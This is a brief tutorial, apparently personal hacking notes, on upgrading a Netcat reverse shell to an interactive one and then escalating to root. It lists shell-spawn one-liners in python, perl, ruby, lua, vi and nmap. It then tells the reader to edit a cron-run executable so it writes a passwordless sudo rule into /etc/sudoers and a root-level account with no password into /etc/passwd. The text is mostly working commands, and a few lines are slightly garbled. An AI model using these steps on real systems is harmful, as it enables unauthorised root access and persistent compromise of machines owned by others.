Tutorial after getting the reverse shell :
When obtaining a reverse shell with a Netcat listener, it is by default non-interactive and 
you cannot pass keyboard shortcuts or special characters such as tab.

It is quite simple to work around. For starters, in your shell, 
run python -c 'import pty;pty.spawn("/bin/bash");' 
python -c 'import pty; pty.spawn("/bin/sh")'

echo os.system('/bin/bash')

/bin/sh -i

perl —e 'exec "/bin/sh";'

perl: exec "/bin/sh";

ruby: exec "/bin/sh"

lua: os.execute('/bin/sh')

(From within IRB)

exec "/bin/sh"

(From within vi)

:!bash

(From within vi)

:set shell=/bin/bash:shell

(From within nmap)

!sh
to obtain a partially interactive bash shell.

After that, do CTRL+Z to background Netcat. Enter stty raw -echo in your terminal, which will tell your terminal to pass keyboard shortcuts etc. through. 
Once that is done, run the command fg to bring Netcat back to the foreground.

After that we can locate the crontab file (etc/crontab) read it and find a process which is executed every minutes (or hours...).
~whoami => current user, copy it

edit the executable => add
echo "user ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
echo "user::0:0:System Administrator:/root/root:/bin/bash" >> /etc/passwd

we can now execute commands with 'sudo' 
